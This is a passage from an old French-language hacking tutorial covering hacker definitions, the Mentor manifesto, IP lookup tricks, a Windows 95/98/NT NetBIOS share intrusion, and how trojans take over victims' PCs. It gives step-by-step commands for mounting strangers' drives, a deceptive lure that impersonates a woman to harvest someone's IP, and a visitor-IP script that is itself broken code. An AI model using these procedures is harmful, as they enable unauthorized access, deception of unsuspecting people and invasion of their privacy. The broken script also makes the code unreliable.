Vous êtes sur la page 1sur 35

Hacking

Descriptif du contenu de cette page:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

Dfinition
Notion d'exploit
Adresses IP
Hack sous Windaube 95 et 98
Hack sous Windaube NT
Troyan Horse (cheval de Troie)
Blooffer
Flooder
Sniffer
Scanner d'ip
Spoofing
Root
Hack par ftp
Les ports
Les Firewalls
Les droits sous UNIX
Les Passwords shadows
NukeNabber et Port Watchers
Cgi-bin et Scripts
Cerner une cible

Dfinition :
Un hacker c'est quoi? Pour la premire dfinition de ce site, je vais essayer
de m'appliquer... C'est un mec (ou une fille, dsol mais faut avouer que
vous tes en trs forte minorit) qui rentre dans des ordinateur o il n'a pas
de droit d'accs et qui jette un coup d'oeil un peu partout pour voir s'il
trouve pas quelque chose d'intressant. Certains affirmeront qu'ils sont l
pour la rgulation de l'Internet ou pour en refaire un espace fun et non un
espace commercial comme il est de plus en plus vou devenir. A chacun
de voir... Dfinition pour les simples d'esprits et les personnes ayant un
esprit particulirement ferm: les hackers c'est les gentils et les crashers

c'est les mchants. Quoi que des fois, dur de faire la diffrence entre un
crasher et un hacker en colre...
Ca c'tait ma dfinition perso mais il en existe une perso de "the mentor",
trs bien crite et qui reprsente bien la manire dont pas mal de Hackers
se sont mis au biz mme si elle ne me correspond pas. Elle est cent fois
mieux que la mienne et j'aimerais crire comme lui. Mais j'ai pas fais
Littraire moi. arf ! vocation?
Dfinition de "The Mentor" : (crite le 8 janvier 1986 et traduite par
NeurAlien le 8 septembre 1994. source: Noway3)
+++ The Mentor +++
Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux.
Scandale: Un adolescent arrt pour crime informatique, arrestation d'un
'Hacker' aprs le piratage d'une banque...
Satans gosses, tous les mmes.
Mais avez vous, dans votre psychologie en trois pices et votre profil
technocratique de 1950, un jour pens regarder le monde derrire les yeux
d'un hacker? Ne vous tes vous jamais demand ce qui l'avait fait agir,
quelles forces l'avaient model ?
Je suis un hacker, entrez dans mon monde...
Le mien est un monde qui commence avec l'cole... Je suis plus astucieux
que la plupart des autres enfants, les conneries qu'ils m'apprennent me
lassent...
Je suis au collge ou au lyce. J'ai cout les professeurs expliquer pour la
quinzime fois comment rduire une fraction. Je l'ai compris. "Non Mme
Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tte".
Satan gosses. Il l'a certainement copi. Tous les mmes.
J'ai fait une dcouverte aujourd'hui. J'ai trouv un ordinateur. Attends une
minute, c'est cool. Ca fait ce que je veux. Si a fait une erreur, c'est parce
que je me suis plant.
Pas parce qu'il ne m'aime pas...
Ni parce qu'il se sent menac par moi...
Ni parce qu'il pense que je suis un petit filous...
Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas tre l...
Satans gosses. Tout ce qu'il fait c'est jouer. Tous les mmes.
Et alors c'est arriv... Une porte s'est ouverte sur le monde... Se prcipitant
a travers la ligne tlphonique comme de l'hrone dans les veines d'un

accro, une impulsion lectronique est envoye, on recherche un refuge


l'incomptence quotidienne... Un serveur est trouv.
Vous vous rptez que nous sommes tous pareils... On a t nourri la
petite cuillre de bouffe pour bb l'cole quand on avait faim d'un
steak... Les fragments de viande que l'on nous a laiss taient pr-machs
et sans got. On a t domin par des sadiques ou ignor par des
apathiques. Les seuls qui avaient des choses nous apprendre trouvrent
des lves volontaires, mais ceux ci sont comme des gouttes dans le
dsert.
C'est notre monde maintenant... Le monde de l'lectron et de l'interrupteur,
la beaut du Baud. Nous utilisons un service dj existant, sans payer ce
qui pourrait tre bon march si ce n'tait pas la proprit de gloutons
profiteurs, et vous nous appelez criminels. Nous explorons... et vous nous
appelez criminels.
Nous recherchons la connaissance... et vous nous appelez criminels.
Nous existons sans couleur de peau, sans nationalit, sans dogme
religieux... et vous nous appelez criminels.
Vous construisez des bombes atomiques, vous financez les guerres,
vous ne punissez pas les patrons de la mafia aux riches avocats,
vous assassinez et trichez, vous manipulez et nous mentez en essayant de
nous faire croire que c'est pour notre propre bien tre, et nous sommes
encore des criminels.
Oui, je suis un criminel. Mon crime est celui de la curiosit. Mon crime est
celui de juger les gens par ce qu'ils pensent et dise, pas selon leur
apparence.
Mon crime est de vous surpasser, quelque chose que vous ne me
pardonnerez jamais.
Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrter cet
individu, mais vous ne pouvez pas tous nous arrter... aprs tout, nous
sommes tous les mmes.
+++ The Mentor +++
Un citation d'un illustre inconnu pour moi mais qui dira srement quelque
choses pas mal d'entre vous:
"Savoir c'est vivre, et maintenir dans l'ignorance c'est presque un homicide"

Notion d'exploit :

Me demandez pas pourquoi a s'appelle comme a, j'en sais rien, surtout


que je trouve le nom particulirement mal choisi. Les exploits ce sont des
procdures que l'on excute de la mme manire chaque fois et qui ne
demande pas trop que l'on rflchisse. Un hacker qui ne fait que des
exploits ne peut se considrer comme tant d'un bon niveau. Deux exploits
trs trs connus ci-dessous: Win95 et WinNT. Un exploit est galement un
petit programme que l'on fait soit mme, que l'on met sur un bcane une
fois un brche ouverte et qui travaille pour vous. Il fait en sorte de vous
procurer des accs plus intressants, notamment celui du root.

Adresses IP :
1
2
3
4

Dfinition
Fonctionnement
Trouver une ip
Cacher une ip

-Dfinition:
Chaque ordinateur connect Internet en a une et elle sert recevoir les
informations que l'on demande via Netscape ou autre... et galement
recevoir des E-Mails. Pour une question de scurit ou de volont de
disponibilit d'adresses pour tout le monde, les adresses IP qui vous sont
donnes par votre fournisseur d'accs changent chaque connexion (IP
dynamiques). Ce qui n'est pas le cas pour les serveurs et les sites de Fac
par exemple. Donc si vous trouvez l'adresse IP d'une personne, il est trs
fortement probable qu'elle ne lui appartienne plus le lendemain.
-Fonctionnement:
Une IP, qu'il est ncessaire de rentrer dans une commande nbtstat par
exemple, est en fait une reprsentation numrique d'une adresse binaire 32
bits. Elle se dcompose de la manire suivante: 152.32.45.210. Dans cet
exemple, 152.32 est l'adresse d'un rseau, le 45 est celui d'un sous rseau
et le 210 est l'adresse quoi que dans certains cas, les deux derniers
numros soient la composante d'une adresse (pour les fournisseurs
d'accs Internet par exemple: AOL, c'est 152 pour le premier numro, les
trois autres variant constamment). Vu que c'est du 32 bits, une adresse IP
ne peut pas dpasser 255.255.255.255.
Si vous voulez connatre le premier numro de l'adresse ip de tel ou tel
fournisseur d'accs, utilisez un scanner d'ip. Rentrez une adresse au

hasard et regarder quel fournisseur elle appartient et vous vous ferez


ainsi une petite liste des ip des fournisseurs d'accs. Recommencez
l'opration en changeant le premier numro... C'est pas trs intressant et
c'est chiant mais c'est pas si long faire que a. Les mecs qui ont
programm les scanners d'ip l'ont bien fait avant vous... Vous trouverez
plusieurs scanner d'ip dans la partieprogs de ce site.
-Trouver une adresse ip :
Trouver une adresse ip au hasard c'est facile mais on ne sait pas qui elle
appartient. Voil comment trouver l'ip d'une personne ou d'un serveur:
- On va commencer par le commencement: vous. Comment trouver son ip?
tapez dmarrer, excuter, winipcfg, l vous obtiendrez des informations sur
votre pc avec entre autre votre adresse ip. Si cette commande ne marche
pas car vous n'avez tout simplement pas ce fichier, il existe une autre
mthode, c'est de s'autonuker. Je sais c'est barbare mais on ne risque rien
si l'on a plac une protection efficace, Dans la partie progs de ce site, j'ai
mis un nuker qui permet d'installer une protection antinuke et aussi de
s'autonuker. Si la protection est mise vous ne risquez rien et le nuker vous
donnera votre adresse ip.
- Si vous voulez trouver l'adresse ip d'un serveur, vous poussez entrer une
commande qui testera la rapidit avec laquelle vous dialoguez avec ce
serveur. Avec la vitesse la commande vous donnera aussi l'adresse ip du
serveur:
tapez: ping -a URLduserveur
exemple: ping -a
www.assassin.com l'URL du serveur est http://www.assassin.com/.
Cette commande doit tre tape sous dos.
Il existe une variance de la commande ping sur irc mais elle ne permet que
de dterminer la rapidit des communications entre un membre et un autre
membre. Pour trouver son adresse ip, on opre comme suit.
- Si vous tes sur irc et que vous voulez trouver l'adresse ip d'une mec y
tant galement:
tapez: /dns pseudo_du_mec
exemple: /dns assassin le mec a comme
pseudo: assassin.
Cette commande doit tre tape sur irc.
- Si vous tes sur icq et que vous voulez l'adresse ip d'un mec y tant
aussi, il suffit d'aller dans ses infos. Pour cela, cliquez sur son pseudo puis
sur info. S'il l'a cach, il y aura marqu N/A dans le place prvu cette
effet. Pour trouver son adresse, bien que ce petit fut l'ai cach, laissez la
fentre info ouverte, mettez votre icq sur "offline" et fermez la fentre info.

Maintenant retournez dans ses infos de la mme manire et l'endroit o il


y avait marqu N/A, il y a maintenant son adresse ip.
- Une autre manire de trouver l'adresse ip d'une personne sous icq si vous
avez une ancienne version d'icq ou si la prcdente mthode ne marche
pas, c'est netstat. Pour le lancer faites: Dmarrer, Excuter, et tapez
"netstat". L une fentre s'ouvrir mais se refermera trs vite alors faites une
copie d'cran l'aide du bouton "Impr cran" du clavier. Pour que netstat
marche, il faut que vous envoyez juste avant un message au mec dont
vous voulez l'ip, puis lancez netstat, copie cran, coller dans paint et voil,
vous avez son ip.
- Une autre manire de trouver l'adresse ip d'un serveur c'est d'ouvrir ftp.
Ftp existe pour permettre la transmission de fichiers. Pour le lancer, si vous
tes sous win, faites Dmarrer, Excuter, et tapez "ftp - n". L, une fentre
s'ouvre:
tapez: open URLduserveur. exemple: open www.assassin.com l'URL du
serveur est ici www.assassin.com.
Cette commande doit tre tape sous ftp.
- Maintenant si vous voulez l'ip d'un mec ne se trouvant pas sur icq ni sur
irc mais que vous savez qu'il est connect (par exemple s'il utilise les
salons d'abonn aol, infonie, club internet, ...), il y a un moyen c'est le mail.
Mais c'est quand mme beaucoup plus compliqu que les autres manires
et c'est surtout chiant faire mais peu connaissent cette mthode et
beaucoup se sentent invulnrable du fait qu'ils croient que leur ip est
cache (pour le commun des mortels en tout cas). On va faire comme si
vous tiez sur AOL. Une fois que vous avez repr le mec de qui vous
voulez l'ip, vous allez lui envoyer un Mail (son adresse est:
pseudo@aol.com) par un serveur POP3, c'est dire un socit d'envois de
mails gratuits comme Yahoo, Caramail, multimania, ... Dans ce courrier
vous allez poser une question quelconque mais vous allez faire croire au
mec qu'il sagit d'un truc important pour vous et que vous avez besoin
absolument d'une rponse. A vous de trouver la question. Vous pouvez
vous faire passer pour une fille si c'est un mec, joindre une photo (belle) de
vous (soit disant vous mais prenez la photo d'une fille assez jolie et non
connue) pour que le mecs soit appt. Ecrivez qu'un de ses potes vous a
parl de lui et que vous aimeriez le rencontrer... Bref, vous l'apptez pour
qu'il veuille vous rpondre. Vous allez crire dans le courrier que vous
aimeriez une rponse rapide et mme instantane si possible (vu que c'est
des ip dynamique, il faudra que vous l'ayez durant cette connection) mais
que votre boite aux lettres aol ne marche pas et qu'il faut que, comme vous,
il passe par le serveur POP3. Bien sur vous lui expliquez dans le mail
comment faire et en dtail car s'il a une quelconque question, vous tes
suppos injoignable et donc c'est foutu. Maintenant il va falloir qu'il aille

regarder son courrier et pour a il y a une commande cool sur aol dans les
salon (malheureusement trop connue) qui permet de faire des sons
notamment faire croire qu'il a du courrier. C'est commande est taper dans
le salon de discussion o le mec est. voil la commande {S courrier.
Trouvez une couleur pour que a se camoufle avec le fond de l'cran et le
tour est jou. Si vous n'tes pas sur aol ou que vous avez peur qu'il le voit
ou qu'il connat dj le technique, demander a un pote a vous que le mec
ne connat pas de lui dire qu'il vient de lui envoyer un mail. Le mec ne verra
rien sauf votre mail et y rpondra. Si il prend la tte a votre copain, dite lui
de dire qu'il s'est tromp de pseudo et qu'il est dsol. Maintenant il va
vous rcrire et passer par le serveur POP3. et quand vous recevrez le
mail vous aurez ce qu'il a crit plus plein de lignes en dessous avec plein
de trucs en anglais. Voil, normalement la premire ligne contient l'ip du
mec. Il y a pleins de lignes et pleins d'ip diffrentes mais si vous tes pas
trop con vous comprendrez aisment qui elles appartiennent. Voil, vous
avez son ip, faites pas de conneries avec cependant. Si un mec essaye de
chopper mon ip ou essaye cette technique avec moi je le dcalque. Bien
sur cette technique marche dans les deux sens ce qui veut dire qu'en
envoyant le premier mail, le mec aura votre ip mais il y a peu de chance
qu'il ait lu cet article et de toute faon c'est pas vous qui avez envoy ce
mail une blonde pulpeuse qui veut un rdv (ou une brune, je sais pas quelle
photo vous mettrez ;-) ). Et de toute faon comme vous ne passez pas par
aol, le mec ne connatra que le pseudo que vous aurez donn au serveur
POP3. L, si vous voulez, vous pouvez faire un lieu de votre adresse du
POP3 celle d'aol (c'est expliqu quand vous prendrez une nouvelle
adresse l-bas)... attention il arrive des fois que vous n'obteniez de cette
faon que l'adresse ip du pop3 du fournisseur d'accs internet du mec,
dans ce cas l, dommage. Et tout les "nbtstat -A" n'y changeront rien.
- Une autre mthode si vous voulez avoir l'ip d'un mec ne se trouvant ni sur
irc et icq, c'est NukeNabber. En effet ce programme vous permet de
connatre l'ip d'un mec essayant de se connecter votre pc et lui refusant
systmatiquement l'entre. Bien sr pour cela il faudra que vous lui donniez
votre ip et qu'il sache ce que c'est car pour une personne n'y connaissant
rien, que voulez vous qu'elle fasse de 4 nombres spars entre eux par des
points? Ds que la personne essaie d'entrez ou de vous nuker... vous avez
son ip et bien sur vous n'tes pas nuk.
- La dernire mthode que je connais pour avoir l'ip d'un mec ne se
trouvant ni sur irc ni sur icq, c'est de le faire venir sur votre ordinateur. En
effet une fois en connection avec votre pc, vous verrez l'ip du mec. Bien sr
il faut le faire venir et pour a il va dj falloir transformer votre pc en
serveur. Alors soit vous avez linux et vous configurez un serveur PPP ou
apache ou alors vous tes sous win et vous devrez tlchargez servU (sur
www.Download.com me dit Jah). Une fois install et configur, votre pc est

devenu un serveur au mme titre que ceux qui ont des sites sur Internet. La
seule diffrence c'est que vous n'avez qu'une ip et pas d'adresse DNS
(adresse DNS, c'est une adresse genre www.micro$hit.com. En effet pour
qu'un serveur ait droit une adresse de ce genre et non plus qu'une simple
ip, il faut qu'il paye entre 500 et 1000 Frs un organisme dont j'ai oubli le
nom. Bah ouais c'est quand mme plus facile retenir une adresse DNS
qu'une IP). Ca vous fait flipper a! Et oui, n'importe qui ayant votre ip peut
entrer dans votre pc par un accs ftp. Bien sr la but ici n'est pas qu'il ait
accs votre "serveur" mais que vous ayez son ip alors vous allez mettre
un firewall qui se chargera de ne faire entrer personne sur votre disque.
Enfin juste assez pour que vous ayez son ip et que lui ne puisse rien faire
une fois l'intrieur. Si vous tes sous windows, vous pouvez utiliser celui
de McAfee disponible sur ce site partie progs ou le Conseal firewall (trs
bon) disponible bientt. Si vous tes sous linux, bah amusez vous
dcompiler et recompiler le noyau une fois le firewall install (youpi!).
Cette mthode est plus chiante que celle avec NukeNabber mais au moins
vous pourrez avoir l'ip de tout le monde mme de celui qui ne sait pas ce
qu'est une ip. Pour l'amener sur votre serveur, il suffira de faire un liens
dans le salon de discussion ou vous tes et de lui demander de cliquer
dessus et prtextant ce que vous voulez. Il suffit de dire que c'est votre site
et que vous aimeriez un avis de sa part... Les personnes mfiantes pour les
virus et les .exe ne le sont gnralement pas pour les liens. Les seuls qui
se mfieront c'est ceux qui connaissent la combine.
- Bon finalement c'tait pas la dernire. Celle l j'hsitais la donner car
une fois donne elle va tre utilise profusion pour votre plus grand
malheur tous alors si vous tes pudiques ne lisez pas a car a pourrait
vous rendre parano l'extrme et je vous avoue qu'il y a de quoi. Bon alors
j'hsitais et comme j'hsite encore je ne vais vous donner qu'une partie
(grande partie) de la rponse. Le truc c'est d'envoyer une personne sur un
site qui a une adresse DNS et non juste une ip (et oui c'etait l'inconvnient
de la combine du dessus) et la mme si une personne connait la combine
elle n'aura aucun moyen de savoir si vous voulez la piger ou non. Le truc
c'est de mettre une instruction en java dans votre page web qui lit l'ip du
visiteur et l'envoit votre adresse E mail. Il ne reste plus qu' faire un lien
vers votre site et que la personne clique dessus ou que vous donniez juste
l'adresse. Le seul inconvenient de cette technique c'est que si plusieurs
visiteurs viennent en meme temps vous ne saurez pas quelle est l'ip de la
personne que vous voulez piger. Mais bon pour ca il suffit d'envoyer la
personne sur un page isole ou personne ne peut aller s'il n'a pas eu de
lien par vous. Un autre inconvenient c'est que la personne si elle se mfie
trouvera votre adresse Email mais encore une fois il suffit de vous inscrire
chez hotmail ou caramail pour que vous vous foutiez de perdre une boite
aux lettres cause d'un mailbombing. J'ai dis que je ne vous donnerais pas
tout donc je vais vous donner l'instruction java qui trouve l'ip et l'affiche sur

une page web mais je ne donnerais pas l'instruction permettant d'envoyer


cette ip une adresse Email ou cacher cette ip du visiteur. Mais
franchement si vous vous y connaissez un peu en java et en html a ne
devrait pas vous poser trop de problmes. En tout cas moi j'en ai eu pour
deux minutes. L'instuction java est la suivante:
<SCRIPT LANGUAGE="JavaScript">
window.onerror=null;
myAddress2 = java.net.InetAddress.getLocalHost();
host = myAddress.getHostName();
ip

= myAddress2.getHostAddress();

document.write("
Ton adresse Ip est :"+ip);
// --></SCRIPT>

Voil, bien sr si la personne, pour se connecter internet a utilis un


blooffer, un spoofer d'ip ou passe par un proxy, vous l'aurez dans l'os mais
vous connaissez combien de personnes qui font a avant de se connecter
internet part moi? Ca doit rpondre votre question sur la fiabilit de la
mthode.
-Cacher son adresse ip :
J'imagine que vous n'avez pas de serveurs alors on va parler de la manire
de cacher son ip pour un particulier, c'est dire sous irc et icq.
- Sous icq, cliquez sur menu en bas gauche de la fentre principale, puis
sur prfrence, puis connection, puis "i'm using a permanent internet
connection (LAN)", puis "i am behind a firewall or proxy", puis firewall
setting", puis "Firewall Settings", puis "I am using a SOCKS4 proxy server",
puis next, l entrez l'adresse ip que vous voulez (pas la votre sinon a ne
sert rien) et mettez le port 1080 (celui d'icq), puis next, Done, ok, et enfin
ok. Icq va s'arrter et quand vous le relancerez, votre adresse ip restera la
mme mais ceux qui chercheront la votre tomberont sur celle que vous
avez dfini plus haut. Cette mthode pourra entraner quelques problmes
de connexion mais ils seront minimes. Le programme icq connatra toujours
votre vritable ip sinon vous ne pourriez communiquer mais si quelqu'un la
cherche il ne la trouvera pas, sauf s'il utilise un programme externe comme
par exemple netstat (expliqu plus haut).
-Sous irc il va falloir faire appel au spoofing ce qui ne revient pas en fait
cacher son ip mais tout simplement en changer en prenant celle d'un autre
mec connect lui aussi sur irc. Cliquez ici pour savoir comment faire.

Hack sous Windaube 95 et 98 :


C'est du super connu, du super facile mais rigolez pas, c'est par a que j'ai
commenc et quand j'ai dcouvert cet exploit sur un site (a fait longtemps
maintenant) j'tais tout joisse (hyper mga content, pour ceux qui
connaissent pas l'expression). Bon, ok a marche une fois tout les 36 du
mois et je peux vous dire que j'ai pass du temps avant de hacker ma
premire bcane avec cette mthode mais bon, c'est quand mme de bons
souvenirs. Cet exploit marche sous win95 mais aussi sous win98 mais pour
cela il faut que l'utilisateur de la machine prise pour cible ait choisi le
partage de fichiers (ce qui est plutt rare car win95 et 98 c'est surtout pour
les particuliers alors que le partage rseau est surtout utilis par les
entreprises mais les entreprises ne sont pas foule possder win95 sur
leur serveurs).
Comme je n'utilise plus cet exploit depuis longtemps, je ne suis plus trs au
fait des manires de le radapter, et il faudra que je me renseigne plus
fond sur ce que je vais vous affirmer maintenant. Mais j'ai l'impression que
c'est exploit de nouveau de beaux jours devant lui car windaube 98 ds
son installation installe le partage de fichier (mais pas d'imprimante, mais
a, une fois dans la bcane a se change). Donc pour les personnes
(nombreuses) ne connaissant pas cet exploit, ne connaissant pas l'utilit du
partage de fichiers, ou tout simplement n'y connaissant que dalle en
informatique (ce qui est de plus en plus le cas avec ces ordinateurs tout
install et tout configur, mme Internet) sont votre porte.
Cette info n'est pas du tout du 100% sr mais je vrifierais et je vous
tiendrais inform. N1 sur l'info locale et internationale...
L'exploit:
C'est un exploit qui se ralise sous Dos puisqu'on utilise le NetBios et l'on a
besoin d'une adresse IP, du nom de l'ordinateur distant, et que le
propritaire de ce dit ordinateur ait cliqu sur "partage de fichiers". Ok, a
fait beaucoup de choses connatre mais vous allez voir, a se dcante
vite. En fait ce qu'il vous faut c'est une ip que vous trouverez au hasard et
qui doit tre celle d'un ordinateur partag (comprenez par l: avec
ressources partages).
Manire de procder :
1/ Pour le raliser il faut ouvrir une fentre MS-DOS si vous tes sous
windows; l, tapez la commande suivante qui vous permettra de trouver le
nom de l'ordinateur qui appartient cette adresse ip:

nbtstat -A ip_de_l'ordinateur_distant
Si vous avez pas compris, je donne un exemple: nbtstat -A
125.35.23.210
(l'adresse ip a t choisie au hasard et le A doit tre en majuscule.
Les espaces ont leur importance)
2/ Ensuite vous allez voir apparatre diffrentes lignes de codes. Suivant
si vous tombez sur une adresse tant attribue ou pas, ces lignes diffrent.
Si un message d'erreur s'affiche (host not found), changez d'adresse, si des
kyrielles de lignes s'affichent, c'est cool mais c'est pas suffisant. Il faut
maintenant que la ligne suivante s'affiche parmi celles qui s'affichent.:
nom_de_l'ordinateur_distant<XX>UNIQUE Registered
Si vous n'avez toujours pas compris, je vais vous redonner un
exemple: assassin<63>UNIQUE Registered
(assassin est le nom de l'ordinateur distant. <XX>, XX est un nombre
qui varie d'un ordinateur l'autre.)
3/ Bon maintenant que vous avez l'ip et le nom de l'ordinateur distant,
vous allez ouvrir et modifier l'diteur de Dos en tapant la commande
suivante:
edit lmhosts
4/ Maintenant que vous tes dans l'diteur de Dos, vous allez taper les
commandes suivantes:
ip_de_l'ordinateur

nom_de_l'ordinateur

#PRE

Si l encore vous avez rien pig, je commence srieusement me


demander si vous n'tes pas un peu lamerz sur les
bords. Mais
comme j'ai une incroyable grandeur d'me (sans modestie aucune), je vais
encore une fois vous expliquer
avec un
exemple: 125.35.23.210
assassin
#PRE
(mme chose que prcdemment et respectez les majuscules
l'endroit o j'en ai mis)
5/ Enregistrez et quittez l'diteur. De retour sur le Dos, tapez la
commande suivante:
nbtstat -R
Vous devriez normalement obtenir: "Successful purge and preload of
the NBT Remote Cache Name Table"

6/ Tapez maintenant:
net view *\\nom_de_l'ordinateur
C'est ce moment la que tout se joue, si les ressources de cet
ordinateur sont partages, vous obtiendrez un inventaires
des
ressources partages (c,d,e, ...) sinon il n'y aura rien dans cet inventaire.
7/ Placez vous dans le rpertoire de windows (je vous explique pas
comment faire, si vous savez pas, prenez des cours au CNED).
8/ A prsent tapez:
net use *\\nom_de_l'ordinateur\X
Les espaces ont de l'importance et vous remplacerez naturellement
"nom_de_l'ordinateur" par "assassin" et le X par la
lettre de la
partition laquelle vous dsirez accder. Si vous voulez accder dans le
rpertoire o se trouve windows,
tapez c$ la place du X.
Voil, vous tes sur le disque c de l'ordinateur distant ayant comme
nom assassin et comme adresse IP 125.35.23.110, n'y faites pas trop de
conneries; souvenez vous, c'est la partie hacking, pas crashing. Si vous
avez besoin de revenir sur cet ordinateur l'avenir, faites une recherche
(dmarrer, rechercher, ordinateur) et tapez "assassin".
Si c'est la premire fois que vous utilisez cet exploit, il faut crer un fichier
lmhosts, pour cela, allez sous dos et tapez:
Edit, nouveau, ip_de_l'ordinateur
nom_de_l'ordinateur_distant
#PRE, sauvegarder, lmhosts, exit.
Le fichier lmhosts doit se trouver dans le rpertoire windows.
C'tait un bon petit exploit pour ceux d'entre vous qui dbutent et de la
rengaine pour les autres. En tout cas je voyais pas mon site sans ce
classique.

Hack sous Windaube NT :


C'est exactement la mme chose que pour windaube 95 ou 98 sauf que
vous n'avez pas besoin de crer de fichier lmhosts et qu'il y a beaucoup
plus de chances que les ressources soient partages. Et vu que c'est la
mme chose, je vous conseillerais de regarder ci-dessus car je n'ai pas
l'intention de me rpter plus qu'il ne faut. ;-p

Troyan Horse (cheval de Troie) :


Le cheval de Troie, qu'est ce que c'est? C'est pas un truc en bois construit
pas des mecs en armure pour prendre une ville fortifie par la ruse, en tout
cas, pas l. Si a s'appelle comme a, vous l'aurez compris, c'est parce que
a reprend la mthode... La forteresse c'est le PC, le cheval c'est le prog,
l'assaillant c'est toi et la victime est dans la merde. Le biz consiste
envoyer un mec le troyen et de lui faire croire qu'il sagit d'autre chose...
Le mec le lance et l, si vous avez son adresse IP, vous pouvez contrler
son ordinateur. Quand je dis contrler c'est tout contrler, vraiment tout.
Vous pouvez imprimer des trucs avec son imprimante, lui piquer des
fichiers, jouer ses jeux, formater son disque, diriger le pointer de sa
sourie, piquer ses passwords ...etc... C'est en partie pour a que je
considre le troyen plus comme un programme de crashers mais j'ai tenu
malgr tout le mettre dans cette rubrique. Me demandez pas pourquoi,
les lubies du Webmaster sans doute.
Le troyen a exist en trois versions diffrentes ce que je sache. Les deux
premiers taient des progs que l'on envoyait en faisant croire que c'tait
autre chose (des nukers par exemple, a intresse tellement de monde
sous irc) mais ds le lancement du programmes, un message d'erreur
s'affichait ( genre: GT0075FR.dll has not found ) et vous tiez infect alors
que vous pensiez juste: "Merde, a marche pas". Et puis un jour, sans
savoir pourquoi, alors que vous reveniez sur irc, vous n'avez plus le
contrle de votre pc, dommage...
La troisime version est la plus sadique, elle se compose comme les
prcdentes de deux parties, l'une que l'on envois la victime et l'autre que
l'on garde et qui nous permet de contrler l'ordinateur disant. Dans cette
version, on garde les deux progs, car ce que l'on envois n'est plus un
troyen mais un programme sain (la dernire version de netscape par
exemple) que l'on a infect avec un troyen. Et ce qui est terrible c'est que le
programme infect n'augmente mme pas de volume (certains disent que
le prog augmente de 100 Mo mais c'est faux) et qu'il fonctionne trs bien.
Il ne faut pas que ceci vous incite ne plus revenir sous irc ou icq car il
existe des "bouffe-troyens" qui, je vous le donne en mille, ... Ca se trouve
trs facilement d'ailleurs, dans la partie progs de ce site, vous trouverez les
diffrents troyens existants ainsi que le bouffe-troyens. Je donne ces
informations car comme je le disais plus haut, c'est des progs de crashers.
Et ces personnes donnant une mauvaise image du Hacking... sus.

A cela des petits futs ont trouv une parade, un prog tout con qui ne peut
se faire dtecter par un bouffe-troyen car il ne ne se met en service que
quand un bouffe-troyen vrifie le systme. Donc jusque l il n'est pas
considr comme troyen. Alors la personne trs contente de possder ce
prog miracle ne se doute pas quelle est contamine et...
Alors quand on vous envois un prog par Internet, vous le testez avec le
bouffe-troyen au moins deux fois de suite et vous avez 99% de chances
qu'il ne vous arrive rien. Mais bon comme les mecs qui programment ces
trucs auront toujours une longueur d'avance sur ceux qui essayent de les
en empcher... faites gaffe de ne pas accepter des .exe, .bat, .zip et .com
de tout le monde. Clickez pour tlcharger un bouffe troyen. La version que
je propose ici neutralise les troyens suivants: rundlls, dmsetup, dmsetup2,
sockets de troie (version 1, 2.0, 2.3 et 2.5), control of sockets de troie
(version 1 et 2.5), hacker's paradise, backdoor, ICKiller, backorifice 120,
netbus (version 1.53 et 1.6) et icqtrojen.
Avec BO (back Orifice) il y a un autre moyen de voir si vous avez t
infect mais a ne marche que pour BO et a n'empche pas au
bouffetroyen d'tre efficace. Cette manire c'est de faire un ping vers l'ip
127.0.0.1 et si vous y voyez le nom de votre ordinateur c'est que vous tes
infest. :-(
Comment a marche? :
Ds que la victime lance la partie virus du troyen (celle qu'on lui refile), le
programme va chercher a crer plusieurs fichiers .exe (gnralement 3). La
partie virus ne sert qu' crer ces fichiers. Les fichiers sont souvent cres
dans Windows/System mais a dpends en fait de troyens. Si ils se foutent
l c'est pour une bonne raison. Tous les ordinateurs ayant windows ont un
point commun, ils ont windows (si si). Vous allez dire: "merci, ca nous
renseigne vachement". Mais ca permet au troyen de ne pas a avoir a
chercher un emplacement sympa diffrent dans chaque bcane ou il va. Je
sais pas si vous tes dj all faire un tour dans le rpertoire system, mais
il y a des tas de programme et personne n'est foutu de tous les retenir ou
de dire a quoi ils servent tous.
Une fois bien cach et reproduis en suffisamment grand nombre pour que
vous ne les viriez pas tous, ils vont chercher se lancer au dmarrage de
la machine. Pour cela, ne croyez pas qu'il vous se contenter de se foutre
dans Windows/Menu dmarrer/Dmarrage, ce serait trop simple, trop
visible et surtout trop facile de les retrouver (quoi que je suis persuad que
plusieurs d'entre vous ne connaissaient mme pas la fonction de ce
rpertoire ;-) ). Ils vont essay de mettre une ligne de code qui les lancera
au dmarrage dans l'autoexec.bat un endroit bien cach. C'est sr que si

vous avez deux applications qui se lancent au dmarrage, vous voyez ces
lignes tout de suite (et donc le nom et l'endroit o se trouvent les troyens)
mais a arrive qu'il y ait des centaines de lignes dans l'autoexec.bat et l
c'est une autre affaire de les trouver. Encore plus vache, ils vont essayer de
se mettre ces mmes lignes dans la base de registre de windows. Pour
ceux qui ne savent pas ce qu'est la base de registre de windows, c'est le
coeur de win. C'est la que les informations sur tous ce que vous avez sur
votre disque est crit: les passwords, les nom des fichiers et leur places, la
vitesse de dfilement des fentres quand elles se minimisent... Si tu
matrises la base de registre, tu matrises tout. Ces tonnes d'informations
sont consultables en lanant Regedit dans Excuter. Allez jeter un coup
d'oeil et vous comprendrez pourquoi ils se foutent l. Si vous connaissez
pas l'emplacement o ils se mettent c'est mme pas la peine d'esprer.
Mais les anti troyens les trouvent trs bien donc il n'est pas ncessaire de
connatre l'emplacement mais si malgr tout vous voulez la connatre,
mailez moi.
Leur but n'est pas simplement de se lancer au dmarrage ou de se
reproduire. Ils ont fait ca pour leur propre scurit et pour tre sr de
pouvoir tre oprationnel ds que la bcane est allume. Oprationnel
pourquoi? Les moyens de rentrer sur une bcane sont les ports et pour y
rentrer il faut qu'ils soient ouverts. Les programmes cres sur la bcane de
la victime servent a. Le port le plus souvent utilis est le telnet (port 23)
mais d'autre comme le ftp peuvent aussi servir. Ces programmes se
camouflent de manire ce que vous ne puissiez pas voir s'ils sont lancs
et donc ne pas les interrompre. ex: Alt + Ctrl + Suppr n'est pas efficace pour
les stopper puisque leur nom ne se trouve pas dans la fentre de win.
La deuxime partie du troyen, celle que vous n'avez pas envoy a la
victime vous sert de poste de contrle en quelque sorte et permet de
communiquer avec les programmes cres sur le disque de la victimes.
C'est pour a qu'ils doivent rester oprationnel, pour que vous ne puisiez
pas perdre la connection avec le pc de la victime (si bien sr elle est
connecte).
